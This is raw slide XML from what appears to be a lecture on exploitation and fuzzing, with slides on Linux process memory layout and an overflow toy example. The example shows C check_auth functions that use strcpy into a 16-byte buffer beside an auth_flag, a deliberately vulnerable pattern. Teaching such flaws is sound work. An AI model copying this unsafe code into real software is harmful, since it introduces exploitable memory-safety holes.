          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2342950" y="2460050"/>
            <a:ext cx="2154900" cy="652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
              <a:t>RESERVED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="486" name="Shape 486"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2885600" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="487" name="Shape 487"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3038000" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="488" name="Shape 488"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3190400" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3342800" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="490" name="Shape 490"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3495200" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="491" name="Shape 491"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3647600" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="492" name="Shape 492"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3800000" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3952400" y="3130850"/>
            <a:ext cx="0" cy="456300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="3482450"/>
            <a:ext cx="1825500" cy="542700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7500">
              <a:alpha val="51980"/>
            </a:srgbClr>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95" name="Shape 495"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="1213550"/>
            <a:ext cx="1825500" cy="678000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0101">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="496" name="Shape 496"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4051117"/>
            <a:ext cx="1825500" cy="338100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="57FF00">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4393635"/>
            <a:ext cx="1825500" cy="338100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FFC9">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4743188"/>
            <a:ext cx="1825500" cy="1810500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A00FF">
              <a:alpha val="51980"/>
            </a:srgbClr>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par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="480"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="481"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="482"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="483"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="484"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="487"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="488"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Shape 503"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory view..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Shape 504"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391475" y="152400"/>
            <a:ext cx="4403222" cy="6600239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Shape 505"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865125" y="257925"/>
            <a:ext cx="2084100" cy="4167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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Shape 506"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865125" y="6261650"/>
            <a:ext cx="2084100" cy="4167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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Shape 507"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216375" y="1550388"/>
            <a:ext cx="4170600" cy="48402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This is easier to comprehend when looking at hex code, and using GDB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hard to comprehend when looking at C/C++ source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>This can differ per OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Windows is different for stack, heap, and shared libraries (.dll in windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Likely the same in BSD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>*Unsure about Solaris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296210" y="5592950"/>
            <a:ext cx="3137400" cy="1085400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Shape 509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="3482450"/>
            <a:ext cx="1825500" cy="542700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7500">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="1213550"/>
            <a:ext cx="1825500" cy="678000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0101">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="511" name="Shape 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4051117"/>
            <a:ext cx="1825500" cy="338100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="57FF00">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="512" name="Shape 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4393635"/>
            <a:ext cx="1825500" cy="338100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FFC9">
              <a:alpha val="51980"/>
            </a:srgbClr>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
        <p:nvSpPr>
          <p:cNvPr id="513" name="Shape 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874645" y="4743188"/>
            <a:ext cx="1825500" cy="1810500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A00FF">
              <a:alpha val="51980"/>
            </a:srgbClr>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Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Exploitation Theory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Fuzzing &amp; Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Types of values to fuzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Some advanced fuzzing techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Exploit 101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Stack overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Live Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Shape 518"/>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Toy Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>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lang="en"/>
              <a:t>Take these two code segments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a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>int auth_flag = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="520" name="Shape 520"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4282575" y="2415625"/>
            <a:ext cx="86700" cy="4377900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Shape 521"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4353425" y="2470750"/>
            <a:ext cx="4645500" cy="4204500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  int auth_flag = 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
